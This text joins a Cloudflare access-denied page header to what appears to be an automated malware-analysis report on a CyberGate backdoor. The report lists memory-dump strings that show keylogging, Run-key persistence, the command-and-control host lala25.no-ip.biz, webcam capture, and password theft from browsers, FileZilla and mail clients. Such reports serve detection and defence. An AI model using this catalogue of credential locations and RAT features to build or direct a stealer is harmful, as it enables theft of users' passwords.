dc9..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->.<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->.<head>.<title>Access denied | stats.teamextrememc.com used CloudFlare to restrict access</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />.<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>.<!--[if lt IE 9]><script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script><![endif]-->.<!--[if gte IE 9]><!--><script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/zepto/1.0/zepto.min.js"></script><
<<
<<< skipped >>>
Map
The Backdoor connects to the servers at the folowing location(s):
Strings from Dumps
javaw.exe_680:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
/Xusage.txt
/Xusage.txt
-Djava.class.path=%s
-Djava.class.path=%s
Unable to locate JRE meeting specification "%s"
Unable to locate JRE meeting specification "%s"
1.6.0_18-b07
1.6.0_18-b07
JRE-Version = %s, JRE-Restrict-Search = %s Selected = %s
JRE-Version = %s, JRE-Restrict-Search = %s Selected = %s
Syntax error in version specification "%s"
Syntax error in version specification "%s"
Invalid or corrupt jarfile %s
Invalid or corrupt jarfile %s
Unable to access jarfile %s
Unable to access jarfile %s
-Djava.awt.headless=
-Djava.awt.headless=
-Djava.awt.headless=true
-Djava.awt.headless=true
option[-] = '%s'
option[-] = '%s'
ignoreUnrecognized is %s,
ignoreUnrecognized is %s,
sun.jnu.encoding
sun.jnu.encoding
isSupported
isSupported
-Dsun.java.command=
-Dsun.java.command=
-Dsun.java.launcher=SUN_STANDARD
-Dsun.java.launcher=SUN_STANDARD
A %c separated list of directories, JAR archives,
A %c separated list of directories, JAR archives,
load Java programming language agent, see java.lang.instrument
load Java programming language agent, see java.lang.instrument
The default VM is %s%s
The default VM is %s%s
is a synonym for the "%s" VM [deprecated]
is a synonym for the "%s" VM [deprecated]
to select the "%s" VM
to select the "%s" VM
Usage: %s [-options] class [args...]
Usage: %s [-options] class [args...]
(to execute a class)
(to execute a class)
or %s [-options] -jar jarfile [args...]
or %s [-options] -jar jarfile [args...]
(to execute a jar file)
(to execute a jar file)
Can't open %s
Can't open %s
Could not find the main class: %s. Program will exit.
Could not find the main class: %s. Program will exit.
Failed to load Main Class: %s
Failed to load Main Class: %s
Could not find the main class: %s. Program will exit.
Could not find the main class: %s. Program will exit.
argv[-] = '%s'
argv[-] = '%s'
Apps' argc is %d
Apps' argc is %d
Main-Class is '%s'
Main-Class is '%s'
Warning: %s VM not supported; %s VM will be used
Warning: %s VM not supported; %s VM will be used
Error: %s VM not supported
Error: %s VM not supported
Error: Unable to resolve VM alias %s
Error: Unable to resolve VM alias %s
Error: Corrupt jvm.cfg file; cycle in alias list.
Error: Corrupt jvm.cfg file; cycle in alias list.
Default VM: %s
Default VM: %s
%s requires class path specification
%s requires class path specification
%s full version "%s"
%s full version "%s"
Warning: %s option is no longer supported.
Warning: %s option is no longer supported.
-Xrunhprof:cpu=old,file=java.prof
-Xrunhprof:cpu=old,file=java.prof
-Xrunhprof:cpu=old,file=%s
-Xrunhprof:cpu=old,file=%s
%ld micro seconds to parse jvm.cfg
%ld micro seconds to parse jvm.cfg
name: %s vmType: %s alias: %s
name: %s vmType: %s alias: %s
name: %s vmType: %s server_class: %s
name: %s vmType: %s server_class: %s
jvm.cfg[%d] = ->%s<-><pre>Warning: unknown VM type on line %d of `%s'</pre><pre>Warning: missing server class VM on line %d of `%s'</pre><pre>Warning: missing VM alias on line %d of `%s'</pre><pre>Warning: missing VM type on line %d of `%s'</pre><pre>Warning: no leading - on line %d of `%s'</pre><pre>Error: could not open `%s'</pre><pre>\jvm.cfg</pre><pre>\bin\splashscreen.dll</pre><pre>%s\jvm.dll</pre><pre>%s\bin\%s\jvm.dll</pre><pre>Version major.minor.micro = %s.%s</pre><pre>Failed reading value of registry key:</pre><pre>Software\JavaSoft\Java Runtime Environment\%s\JavaHome</pre><pre>Error opening registry key 'Software\JavaSoft\Java Runtime Environment\%s'</pre><pre>Registry key 'Software\JavaSoft\Java Runtime Environment\CurrentVersion'</pre><pre>has value '%s', but '1.6' is required.</pre><pre>Error opening registry key 'Software\JavaSoft\Java Runtime Environment'</pre><pre>-Dsun.java2d.opengl</pre><pre>-Dsun.java2d.d3d</pre><pre>-Dsun.java2d.noddraw</pre><pre>-Dsun.awt.warmup</pre><pre>Unable to resolve path to current %s executable: %s</pre><pre>CreateProcess(%s, ...) failed: %s</pre><pre>ReExec Args: %s</pre><pre>ReExec Command: %s (%s)</pre><pre>ExecJRE: new: %s</pre><pre>ExecJRE: old: %s</pre><pre>Error: could not find java.dll</pre><pre>JRE path is %s</pre><pre>%s\jre\bin\java.dll</pre><pre>%s\bin\java.dll</pre><pre>Error loading: %s</pre><pre>CRT path is %s</pre><pre>\bin\msvcr71.dll</pre><pre>EnsureJreInstallation:%s:load failed</pre><pre>\bin\jkernel.dll</pre><pre>EnsureJreInstallation:<%s>:not found</pre><pre>EnsureJreInstallation:unsupported platform</pre><pre>Error: can't find JNI interfaces in: %s</pre><pre>JVM path is %s</pre><pre>\bin\awt.dll</pre><pre>\bin\java.dll</pre><pre>\bin\verify.dll</pre><pre>Error: no `%s' JVM at `%s'.</pre><pre>Error: no known VMs. (check for corrupt jvm.cfg file)</pre><pre>before: "%s"</pre><pre>after : "%s"</pre><pre>META-INF/MANIFEST.MF</pre><pre>1.1.3</pre><pre>inflate 1.1.3 Copyright 1995-1998 Mark Adler</pre><pre>mscoree.dll</pre><pre>Broken pipe</pre><pre>Inappropriate I/O control operation</pre><pre>Operation not permitted</pre><pre>kernel32.dll</pre><pre>- This application cannot run using the active version of the Microsoft .NET Runtime</pre><pre>Please contact the application's support team for more information.</pre><pre>GetProcessWindowStation</pre><pre>user32.dll</pre><pre>internal state. The program cannot safely continue execution and must</pre><pre>continue execution and must now be terminated.</pre><pre>C:\BUILD_~1\jdk6_18\control\build\WINDOW~1\tmp\java\javaw\obj\javaw.pdb</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>RegEnumKeyA</pre><pre>ADVAPI32.dll</pre><pre>USER32.dll</pre><pre>GetCPInfo</pre><pre>KERNEL32.dll</pre><pre>%Program Files%\Java\jre6\bin\javaw.exe</pre><pre><assemblyIdentity version="6.0.180.7"><pre>name="javaw.exe"</pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre><requestedExecutionLevel><pre>3333333333330</pre><pre>333333333307</pre><pre>PP%d(jjjjj</pre><pre>6.0.180.7</pre><pre>javaw.exe</pre><b>javaw.exe_680_rwx_00B70000_00218000:</b><pre>\$`#\$\3</pre><pre>8&</pre><pre>\$` \$,;</pre><b>svchost.exe_1592:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>ole32.dll</pre><pre>ntdll.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExW</pre><pre>GetProcessHeap</pre><pre>NtOpenKey</pre><pre>svchost.pdb</pre><pre>\PIPE\</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Svchost</pre><pre>\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\</pre><pre>5.1.2600.5512 (xpsp.080413-2111)</pre><pre>svchost.exe</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><b>svchost.exe_1592_rwx_00400000_0006F000:</b><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>Portions Copyright (c) 1999,2003 Avenger by NhT</pre><pre>kernel32.dll</pre><pre>Kernel32.dll</pre><pre>ntdll.dll</pre><pre>789:;<&'()* ,-./12345</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>shlwapi.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>Shell32.dll</pre><pre>lsass.exe</pre><pre>svchost.exe</pre><pre>GetProcessHeap</pre><pre>oleaut32.dll</pre><pre>RegOpenKeyExW</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyW</pre><pre>RegCloseKey</pre><pre>GetWindowsDirectoryW</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExW</pre><pre>MapVirtualKeyW</pre><pre>GetKeyboardLayout</pre><pre>GetKeyState</pre><pre>SHDeleteKeyW</pre><pre>FindExecutableW</pre><pre>ShellExecuteW</pre><pre>URLDownloadToFileW</pre><pre>DeleteUrlCacheEntryW</pre><pre>GetKeyboardState</pre><pre>FtpPutFileW</pre><pre>FtpSetCurrentDirectoryW</pre><pre>1 1$1(1,1</pre><pre>S#t%dL</pre><pre>].hMIo</pre><pre>Qp.XQ5</pre><pre>*vjE%F</pre><pre>.Asj`</pre><pre>dT.Kv</pre><pre>Û7U</pre><pre>EsSh`V</pre><pre>ST%uM</pre><pre>%Cz)e</pre><pre>1]o:%d</pre><pre>3.nMXg</pre><pre>--9b}%</pre><pre>TcPD</pre><pre>%2uBa</pre><pre>%\K.TW</pre><pre>1uWkpb.nO</pre><pre>;.LT7</pre><pre>^0.BN!f`' _</pre><pre>.M.FQ</pre><pre>).sJ8</pre><pre>^D.SJ</pre><pre>yn.MQ</pre><pre>=js%C</pre><pre>.Qi/@</pre><pre>j.mcT</pre><pre>k.Am7</pre><pre>B^.mM:Gd</pre><pre>~1.ZRGY#%</pre><pre>vvH<</pre><pre>KWindows</pre><pre>Cm_Keylogger</pre><pre>x.html</pre><pre>explorer.exe</pre><pre>%USECRYPTERSETTINGS%</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>BINDERPASS</pre><pre>[Execute]</pre><pre>KeyDelBackspace</pre><pre>CyberGateKeylogger</pre><pre>explorer.exe</pre><pre>http://</pre><pre>.functions</pre><pre>ÞFAULTBROWSER%</pre><pre>%USECRYPTER%</pre><pre>SETTINGSPASS</pre><pre>\Microsoft\Windows\</pre><pre>CYBERGATEPASS</pre><pre>lala25.no-ip.biz</pre><pre>C:\User</pre><pre>InstallDir.exe</pre><pre>2.5.2.0</pre><pre>ftp.ftpserver.com</pre><pre>ftpuser</pre><pre>ftppass</pre><pre>Then set URL here.</pre><pre>calc.exe</pre><pre>notepad.exe</pre><pre>http://www.somehosting.com/tagger.php</pre><pre>::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}</pre><pre>::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}</pre><pre>::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%</pre><pre>example@email.com</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\</pre><pre>%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo</pre><b>iexplore.exe_3128:</b><pre>`.rsrc</pre><pre>kernel32.dll</pre><pre>Windows</pre><pre>MSWHEEL_ROLLMSG</pre><pre>MSH_WHEELSUPPORT_MSG</pre><pre>MSH_SCROLL_LINES_MSG</pre><pre>$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)</pre><pre>oleaut32.dll</pre><pre>EVariantBadIndexError</pre><pre>ssShift</pre><pre>htKeyword</pre><pre>EInvalidOperation</pre><pre>u%CNu</pre><pre>%s[%d]</pre><pre>%s_%d</pre><pre>EIdCanNotBindPortInRange</pre><pre>EIdInvalidPortRange\wc</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStreamVCL.pas</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdGlobal.pas</pre><pre>WS2_32.DLL</pre><pre>MSWSOCK.DLL</pre><pre>getservbyport</pre><pre>WSAAsyncGetServByPort</pre><pre>WSAJoinLeaf</pre><pre>WSARecvMsg</pre><pre>WSASendMsg</pre><pre>Wship6.dll</pre><pre>Fwpuclnt.dll</pre><pre>TIdSocketListWindows</pre><pre>TIdStackWindowsU</pre><pre>Kernel32.dll</pre><pre>EIdIPVersionUnsupportedP</pre><pre>127.0.0.1</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStack.pas</pre><pre>EIdPortRequired</pre><pre>EIdTCPConnectionError</pre><pre>EIdObjectTypeNotSupported</pre><pre>ftpTransfer</pre><pre>ftpReady</pre><pre>ftpAborted</pre><pre>PortT</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandler.pas</pre><pre>ClientPortMin</pre><pre>ClientPortMax</pre><pre>Port|</pre><pre>"EIdTransparentProxyUDPNotSupported</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandlerStack.pas</pre><pre>%EIdSocksUDPNotSupportedBySOCKSVersion</pre><pre>saUsernamePassword</pre><pre>Password</pre><pre>PortD</pre><pre>0.0.0.1</pre><pre>0.0.0.0</pre><pre>BoundPort</pre><pre>DefaultPortD</pre><pre>TIdTCPConnection</pre><pre>TIdTCPConnectionX</pre><pre>IdTCPConnection</pre><pre>TIdTCPClientCustom</pre><pre>IdTCPClient</pre><pre>TIdTCPClient</pre><pre>TIdTCPClientH</pre><pre>BoundPortT</pre><pre>ole32.dll</pre><pre>EInvalidGraphicOperation</pre><pre>Please contact Cyber-Software support</pre><pre>shlwapi.dll</pre><pre>WbemScripting.SWbemLocator</pre><pre>%s\%s</pre><pre>SELECT * FROM %s</pre><pre>pathToSignedProductExe</pre><pre>pathToSignedReportingExe</pre><pre>USER32.DLL</pre><pre>comctl32.dll</pre><pre>uxtheme.dll</pre><pre>MAPI32.DLL</pre><pre>IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")</pre><pre>JumpID("","%s")</pre><pre>TKeyEvent</pre><pre>TKeyPressEvent</pre><pre>HelpKeyword</pre><pre>crSQLWait</pre><pre>%s (%s)</pre><pre>imm32.dll</pre><pre>AutoHotkeys</pre><pre>ssHotTrack</pre><pre>TWindowState</pre><pre>poProportional</pre><pre>TWMKey</pre><pre>KeyPreview</pre><pre>WindowState</pre><pre>OnKeyDown46g</pre><pre>OnKeyPress</pre><pre>OnKeyUp</pre><pre>System\CurrentControlSet\Control\Keyboard Layouts\%.8x</pre><pre>vcltest3.dll</pre><pre>User32.dll</pre><pre>TWebcam</pre><pre>SetupApi.dll</pre><pre>SetupDiOpenClassRegKey</pre><pre>SetupDiOpenClassRegKeyExA</pre><pre>SetupDiOpenClassRegKeyExW</pre><pre>SetupDiCreateDeviceInterfaceRegKeyA</pre><pre>SetupDiCreateDeviceInterfaceRegKeyW</pre><pre>SetupDiOpenDeviceInterfaceRegKey</pre><pre>SetupDiDeleteDeviceInterfaceRegKey</pre><pre>SetupDiCreateDevRegKeyA</pre><pre>SetupDiCreateDevRegKeyW</pre><pre>SetupDiOpenDevRegKey</pre><pre>SetupDiDeleteDevRegKey</pre><pre>CM_DEVCAP_LOCKSUPPORTED</pre><pre>CM_DEVCAP_EJECTSUPPORTED</pre><pre>PDCAP_D0_SUPPORTED</pre><pre>PDCAP_D1_SUPPORTED</pre><pre>PDCAP_D2_SUPPORTED</pre><pre>PDCAP_D3_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D0_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D1_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D2_SUPPORTED</pre><pre>PDCAP_WAKE_FROM_D3_SUPPORTED</pre><pre>PDCAP_WARM_EJECT_SUPPORTED</pre><pre>ISO_646.irv:1991</pre><pre>ISO_646.basic:1983</pre><pre>ISO_646.irv:1983</pre><pre>csISO16Portuguese</pre><pre>csISO84Portuguese2</pre><pre>windows-936</pre><pre>csShiftJIS</pre><pre>windows-874</pre><pre>ISO-8859-1-Windows-3.0-Latin-1</pre><pre>csWindows30Latin1</pre><pre>ISO-8859-1-Windows-3.1-Latin-1</pre><pre>csWindows31Latin1</pre><pre>ISO-8859-2-Windows-Latin-2</pre><pre>csWindows31Latin2</pre><pre>ISO-8859-9-Windows-Latin-5</pre><pre>csWindows31Latin5</pre><pre>csMicrosoftPublishing</pre><pre>Windows-31J</pre><pre>csWindows31J</pre><pre>PTCP154</pre><pre>csPTCP154</pre><pre>windows-1250</pre><pre>windows-1251</pre><pre>windows-1252</pre><pre>windows-1253</pre><pre>windows-1254</pre><pre>windows-1255</pre><pre>windows-1256</pre><pre>windows-1257</pre><pre>windows-1258</pre><pre>HTTP-EQUIV</pre><pre>()<>@,;:\"./</pre><pre>()<>@,;:\"/[]?=</pre><pre>()<>@,;:\"/[]?={}</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdThread.pas</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdScheduler.pas</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdServerIOHandlerSocket.pas</pre><pre>EIdTCPNoOnExecute</pre><pre>TIdTCPServer</pre><pre>TIdTCPServerX</pre><pre>IdTCPServer</pre><pre>OnExecute</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdSchedulerOfThread.pas</pre><pre>%s User</pre><pre>IdCustomTCPServer</pre><pre>TIdCustomTCPServer</pre><pre>DefaultPort</pre><pre>EIdTCPServerError</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCustomTCPServer.pas</pre><pre>CmdDelimiter</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCommandHandlers.pas</pre><pre>'TIdCmdTCPServerAfterCommandHandlerEvent</pre><pre>TIdCmdTCPServer</pre><pre>(TIdCmdTCPServerBeforeCommandHandlerEvent</pre><pre>IdCmdTCPServer</pre><pre>Displays commands that the servers supports.</pre><pre>TIdTCPStream</pre><pre>IdRead() method of TIdTCPStream class does not support seeking</pre><pre>TIdHTTPProxyTransferMode</pre><pre>TIdHTTPProxyServerContextt</pre><pre>TIdHTTPProxyServerContext$</pre><pre>TOnHTTPContextEvent</pre><pre>TIdHTTPProxyServerContext</pre><pre>TOnHTTPDocument</pre><pre>TIdHTTPProxyServer</pre><pre>OnHTTPBeforeCommand</pre><pre>OnHTTPResponse</pre><pre>OnHTTPDocument</pre><pre>HTTP/1.0</pre><pre>HTTP/1.0 200 Connection established</pre><pre>HNetCfg.FwMgr</pre><pre>HNetCfg.FwAuthorizedApplication</pre><pre>PSAPI.dll</pre><pre>TWebcamThread</pre><pre>Uh.Uk</pre><pre>789:;<&'()* ,-./12345</pre><pre>iphlpapi.dll</pre><pre>AllocateAndGetTcpExTableFromStack</pre><pre>AllocateAndGetUdpExTableFromStack</pre><pre>SetTcpEntry</pre><pre>GetExtendedTcpTable</pre><pre>GetExtendedUdpTable</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\</pre><pre>TSendKey</pre><pre>sqlite3_bind_blob</pre><pre>sqlite3_bind_text</pre><pre>sqlite3_bind_double</pre><pre>sqlite3_bind_int</pre><pre>sqlite3_bind_int64</pre><pre>sqlite3_bind_null</pre><pre>sqlite3_bind_parameter_index</pre><pre>sqlite3_open</pre><pre>sqlite3_close</pre><pre>sqlite3_errmsg</pre><pre>sqlite3_free</pre><pre>sqlite3_prepare_v2</pre><pre>sqlite3_column_count</pre><pre>sqlite3_column_name</pre><pre>sqlite3_column_decltype</pre><pre>sqlite3_step</pre><pre>sqlite3_column_blob</pre><pre>sqlite3_column_bytes</pre><pre>sqlite3_column_double</pre><pre>sqlite3_column_text</pre><pre>sqlite3_column_type</pre><pre>sqlite3_column_int64</pre><pre>sqlite3_finalize</pre><pre>sqlite3_reset</pre><pre>ESQLiteException</pre><pre>TSQLiteDatabaseD</pre><pre>TSQLiteTable</pre><pre>Failed to open database "%s" : %s</pre><pre>Failed to open database "%s" : unknown error</pre><pre>Error executing SQL</pre><pre>Could not prepare SQL statement</pre><pre>Error executing SQL statement</pre><pre>SQLite is Busy</pre><pre>SOFTWARE\Mozilla\Mozilla Firefox</pre><pre>SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox</pre><pre>SOFTWARE\Mozilla\Mozilla Firefox\</pre><pre>SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\</pre><pre>1234567890.</pre><pre>mozsqlite3.dll</pre><pre>sqlite3.dll</pre><pre>mozcrt19.dll</pre><pre>msvcr100.dll</pre><pre>mozglue.dll</pre><pre>mozutils.dll</pre><pre>nspr4.dll</pre><pre>plc4.dll</pre><pre>plds4.dll</pre><pre>nssutil3.dll</pre><pre>nss3.dll</pre><pre>PK11_GetInternalKeySlot</pre><pre>\Mozilla\Firefox\profiles.ini</pre><pre>\Mozilla\Firefox\</pre><pre>signons.sqlite</pre><pre>SELECT * FROM moz_logins</pre><pre>encryptedPassword</pre><pre>Microsoft\Network\Connections\pbk\rasphone.pbk</pre><pre>rasapi32.dll</pre><pre>rnaph.dll</pre><pre>RAS Passwords</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion</pre><pre>Ps_Passwords</pre><pre>advapi32.dll</pre><pre>WindowsLive:name=*</pre><pre>\Mozilla Firefox\</pre><pre>MSVCR100.dll</pre><pre>softokn3.dll</pre><pre>userenv.dll</pre><pre>profiles.ini</pre><pre>\signons3.txt</pre><pre>\signons2.txt</pre><pre>\signons1.txt</pre><pre>\signons.txt</pre><pre>ps_SafariPasswordRecovery</pre><pre>AVURLProtocol_Classic</pre><pre>\Apple Computer\Preferences\keychain.plist</pre><pre>\Apple\Apple Application Support\CFNetwork.dll</pre><pre>http://</pre><pre>ftp://</pre><pre>*ftp://</pre><pre>https://</pre><pre>Shell.Application</pre><pre>http://cyber-sec.org/email/asp/email.php?email=</pre><pre>TMemoryOperation</pre><pre>%sysdir%\</pre><pre>%serverpath%\</pre><pre>%sysdir%</pre><pre>%serverpath%</pre><pre>Proxy Bypass</pre><pre>ntdll.dll</pre><pre>TPasswordItem</pre><pre>TArrayPasswod</pre><pre>Crypt32.dll</pre><pre>shell32.dll</pre><pre>Advapi32.dll</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX\version.dll\Main</pre><pre>select * from moz_logins</pre><pre>Firefox</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX\</pre><pre>\Flock\Browser\profiles.ini</pre><pre>Flock-Firefox</pre><pre>\1-abc\personal calendar\sqlite3.dll</pre><pre>\clipdiary\sqlite3.dll</pre><pre>\conceptworld\recentx\sqlite3.dll</pre><pre>\darq software\transmute\sqlite3.dll</pre><pre>\delphish\sqlite3.dll</pre><pre>\ditto\sqlite3.dll</pre><pre>\du meter\sqlite3.dll</pre><pre>\fcleaner\sqlite3.dll</pre><pre>\file seeker\sqlite3.dll</pre><pre>\flashnote\sqlite3.dll</pre><pre>\flashpaste\sqlite3.dll</pre><pre>\gorecord\sqlite3.dll</pre><pre>\gorecord2\sqlite3.dll</pre><pre>\linkcollector portable\sqlite3.dll</pre><pre>\ma-config.com\sqlite3.dll</pre><pre>\macrovirus\sqlite3.dll</pre><pre>\msnsniffer2\sqlite3.dll</pre><pre>\notecable\sqlite3.dll</pre><pre>\nzbleecher\sqlite3.dll</pre><pre>\outlook express\sqlite3.dll</pre><pre>\page update watcher\sqlite3.dll</pre><pre>\pipi\sqlite3.dll</pre><pre>\qloud\sqlite3.dll</pre><pre>\qloud\winamp\sqlite3.dll</pre><pre>\qloud\windows media player\sqlite3.dll</pre><pre>\recordtheradio\sqlite3.dll</pre><pre>\rightload\sqlite3.dll</pre><pre>\smm\funny sms10\sqlite3.dll</pre><pre>\smm\simple mail 7\sqlite3.dll</pre><pre>\spiceworks\bin\sqlite3.dll</pre><pre>\spyware-secure\sqlite3.dll</pre><pre>\timelog\sqlite3.dll</pre><pre>\video2webcam\sqlite3.dll</pre><pre>\webmarkers\sqlite3.dll</pre><pre>\webmediaplayer\sqlite3.dll</pre><pre>\windows media player\plugins\qloud\sqlite3.dll</pre><pre>\Mozilla Firefox\sqlite3.dll</pre><pre>\VirusGuardPlus\sqlite3.dll</pre><pre>\Safari\sqlite3.dll</pre><pre>\AIMP2\sqlite3.dll</pre><pre>\Live-Player\sqlite3.dll</pre><pre>\TrustedProtection\sqlite3.dll</pre><pre>\PCTotalDefender\sqlite3.dll</pre><pre>\Common Files\eEye Digital Security\Application Bus\sqlite3.dll</pre><pre>Windows Live Messenger</pre><pre>DynDNS\Updater\config.dyndns</pre><pre>Password=</pre><pre>Software\DownloadManager\Passwords</pre><pre>Software\DownloadManager\Passwords\</pre><pre>EncPassword</pre><pre>YLoginWnd</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>FileZilla\recentservers.xml</pre><pre>FileZilla\sitemanager.xml</pre><pre>FileZilla\filezilla.xml</pre><pre><password></password></pre><pre>.purple\accounts.xml</pre><pre>abe2869f-9b47-4cd9-a358-c22904dba7f7</pre><pre>trillian.ini</pre><pre>accounts.ini</pre><pre>password</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian</pre><pre>Trillian\trillian.exe</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\</pre><pre>###@@@!!!</pre><pre>IMAP Password</pre><pre>IMAP Password:</pre><pre>POP3 Password</pre><pre>POP3 Password:</pre><pre>HNetCfg.NATUPnP</pre><pre>StaticPortMappingCollection</pre><pre>Uh%Fm</pre><pre>TCpuUsageU</pre><pre>##,##0.00</pre><pre>TNewFTPThreadU</pre><pre>TPasswordU</pre><pre>SHFileOperationW</pre><pre>.hd'n</pre><pre>.hd*n</pre><pre>%s %s</pre><pre>Windows NT %d.%d</pre><pre>%s %s Server</pre><pre>Unknown Platform ID (%d)</pre><pre>%d.%d</pre><pre>%s [Build: %d</pre><pre>- Service Pack: %s</pre><pre>KERNEL32.DLL</pre><pre>TIdTCPClientNewp</pre><pre>TIdTCPClientNew</pre><pre>1.2.3</pre><pre>deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>?456789:;<=</pre><pre>!"#$%&'()* ,-./0123</pre><pre>com.apple.Safari</pre><pre>com.apple.Safari0123456789ABCDEF</pre><pre>333333333333333333</pre><pre>33333833</pre><pre>3333339</pre><pre>3333333333333338</pre><pre>:*"*"$3338</pre><pre>3333333</pre><pre>33333333</pre><pre>33333333333</pre><pre>3333333333338</pre><pre>33338?383</pre><pre>333333333333</pre><pre>:*3:"$3338</pre><pre>333333333333333</pre><pre>KWindows</pre><pre>IdStackWindows</pre><pre>Sr_StartWebcam</pre><pre>UrlMon</pre><pre>UnitWebcamAPI</pre><pre>IdTCPStream</pre><pre> IdTCPServer</pre><pre>Sr_Windows</pre><pre>Cm_Keylogger</pre><pre>~Sr_Ports</pre><pre>}Unitsndkey32</pre><pre>Vps_FireFox3_5</pre><pre>SQLiteTable3</pre><pre>SQLite3</pre><pre>Ps_IEpasswords</pre><pre>ps_URLHistory</pre><pre>FPs_PasswordRecovery</pre><pre>Ps_OperaPasswords</pre><pre>Sr_MemoryEXE</pre><pre>Sr_MemoryExecuteFunctions</pre><pre>U_GrabFirefox10</pre><pre>YU_GrabFirefox8</pre><pre>6U_GrabFirefox</pre><pre>\U_GrabChrome</pre><pre>U_GrabFirefox15</pre><pre>U_Grabfirefox22</pre><pre>{IdCmdTCPClient</pre><pre>SetNamedPipeHandleState</pre><pre>GetWindowsDirectoryW</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>CreatePipe</pre><pre>RegQueryInfoKeyA</pre><pre>RegOpenKeyExW</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyW</pre><pre>RegOpenKeyA</pre><pre>RegFlushKey</pre><pre>RegEnumKeyExW</pre><pre>RegEnumKeyExA</pre><pre>RegDeleteKeyW</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>RegCreateKeyW</pre><pre>RegCloseKey</pre><pre>CryptImportKey</pre><pre>CryptSetKeyParam</pre><pre>CryptDestroyKey</p